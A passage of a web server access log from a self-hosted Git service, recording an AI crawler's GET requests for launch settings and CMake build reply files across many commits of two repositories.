-[17/Feb/2026:18:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 74.7.227.38] [Length 9834] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" -[17/Feb/2026:18:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json?display=source" [Client 74.7.227.38] [Length 11689] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" -[17/Feb/2026:18:24:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json?display=rendered" [Client 74.7.227.38] [Length 11187] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" -[17/Feb/2026:18:24:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 74.7.227.38] [Length 10985] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" -[17/Feb/2026:18:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 74.7.227.38] [Length 267] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" -[17/Feb/2026:18:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 74.7.227.38] [Length 957] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" -[17/Feb/2026:18:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 2023] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:18:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11583] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10782] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 2023] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:18:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 33295] [Gzip 10.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11614] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 33298] [Gzip 10.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:25:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" -[17/Feb/2026:18:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" -[17/Feb/2026:18:25:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" -[17/Feb/2026:18:25:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/Properties/launchSettings.json" -[17/Feb/2026:18:25:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11615] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11612] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 20172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:18:25:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10778] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:25:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 14822] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:25:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11586] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:25:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 20172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:18:25:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:25:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 20172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:18:25:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:25:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 20172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:18:25:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:18:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 14819] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:25:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 14823] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:25:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:25:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:25:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10783] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:18:25:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10780] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:25:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11612] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:25:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11616] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:25:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 14824] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:25:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11616] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:25:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10760] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:18:25:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 2023] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:18:25:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 2023] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:18:25:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11616] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:25:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 33256] [Gzip 10.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:25:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11615] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 